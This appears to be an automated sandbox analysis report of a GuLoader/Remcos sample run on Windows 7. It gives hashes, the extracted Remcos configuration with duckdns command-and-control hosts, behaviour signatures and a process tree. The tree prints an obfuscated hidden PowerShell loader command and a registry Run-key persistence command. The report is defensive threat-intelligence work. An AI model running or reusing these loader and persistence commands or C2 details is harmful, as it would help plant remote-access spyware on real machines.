Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    17-05-2024 12:12

General

  • Target

    5997f5719c8272c35a0428f7cf2804f9eabb9e8260a9ed8f3e38807c8ba15a41.exe

  • Size

    384KB

  • MD5

    5d44e0aa3a2b58c2877f513d80d01e19

  • SHA1

    578fd865531470f640aed391a3b21993237c424b

  • SHA256

    5997f5719c8272c35a0428f7cf2804f9eabb9e8260a9ed8f3e38807c8ba15a41

  • SHA512

    37785964539860a328613c2d1b2454b7885fdc037a5ed95778afd66a822319a4fdf3d320142e75b1ee749a488a063f283d5a8683c54e56f0dd4c3b9356257d8b

  • SSDEEP

    6144:DDv9rF8ANTnYjY+98jtTG1bSqOMYZHEeK20CSdLMDoCiSYDBSmE5WhDTXHwQ0w:/p7FkcsSqOREveA4ECKBSRydf

Malware Config

Extracted

Family

remcos

Botnet

Protected

C2

jgbours284hawara02.duckdns.org:3050

jgbours284hawara02.duckdns.org:3051

jgbours284hawara03.duckdns.org:3050

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    jiourhjs.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    klpcourg-793VPF

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5997f5719c8272c35a0428f7cf2804f9eabb9e8260a9ed8f3e38807c8ba15a41.exe
    "C:\Users\Admin\AppData\Local\Temp\5997f5719c8272c35a0428f7cf2804f9eabb9e8260a9ed8f3e38807c8ba15a41.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:1872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Kernebiders=Get-Content 'C:\Users\Admin\AppData\Local\mesostoma\Vicomtesses\Rettelsens.Fun';$Henvisningsformaalenes=$Kernebiders.SubString(52381,3);.$Henvisningsformaalenes($Kernebiders)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2204
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2632
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of WriteProcessMemory
          PID:2488
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bladselleriens168" /t REG_EXPAND_SZ /d "%Dicyandiamide% -windowstyle minimized $Anillas=(Get-ItemProperty -Path 'HKCU:\Sufflr50\').Fanegas;%Dicyandiamide% ($Anillas)"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2496
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bladselleriens168" /t REG_EXPAND_SZ /d "%Dicyandiamide% -windowstyle minimized $Anillas=(Get-ItemProperty -Path 'HKCU:\Sufflr50\').Fanegas;%Dicyandiamide% ($Anillas)"
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:2892

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\mesostoma\Vicomtesses\Rettelsens.Fun

      Filesize

      51KB

      MD5

      6b26f241773f6d93d74baa158720f000

      SHA1

      27544fb26ed0f29e578e75086f237053f33d447b

      SHA256

      08c8481e9f4d40638f5754c9949884bc8ee962a5cc0dad71455f03043ad9ca1a

      SHA512

      f8d411c78094a180f9b5a4c0136df2c9f99d7fdf5dbc6842eb13bc96c062a93c7df666367deda8451a3c5e5a5eb17e33e6bd90b2482663a4acbebf38bd0ef19f

    • C:\Users\Admin\AppData\Local\mesostoma\Vicomtesses\Stoneite.Sub

      Filesize

      331KB

      MD5

      487bff0f93689ca23ac0bc1884bbc5a5

      SHA1

      c032d16c921940bcff3f40e4c7f051d4a7d3af74

      SHA256

      748d7d417c84a5655fd63d1563e01a9f65287c47e35a501516237497d123338d

      SHA512

      708e5026a25e5043c3c05e51a86e76d85b79d9ea3c032520e2cb7714a8e4a3fd1684356dcd30a99d721146f9b06e94f76c7e45d5b8606a0e3b0e981f7a8cb368

    • memory/2204-8-0x00000000738C1000-0x00000000738C2000-memory.dmp

      Filesize

      4KB

    • memory/2204-9-0x00000000738C0000-0x0000000073E6B000-memory.dmp

      Filesize

      5.7MB

    • memory/2204-11-0x00000000738C0000-0x0000000073E6B000-memory.dmp

      Filesize

      5.7MB

    • memory/2204-12-0x00000000738C0000-0x0000000073E6B000-memory.dmp

      Filesize

      5.7MB

    • memory/2204-10-0x00000000738C0000-0x0000000073E6B000-memory.dmp

      Filesize

      5.7MB

    • memory/2204-16-0x0000000006710000-0x000000000C5CD000-memory.dmp

      Filesize

      94.7MB

    • memory/2204-17-0x00000000738C0000-0x0000000073E6B000-memory.dmp

      Filesize

      5.7MB

    • memory/2488-34-0x0000000000C40000-0x0000000001CA2000-memory.dmp

      Filesize

      16.4MB

    • memory/2488-35-0x0000000001CB0000-0x0000000007B6D000-memory.dmp

      Filesize

      94.7MB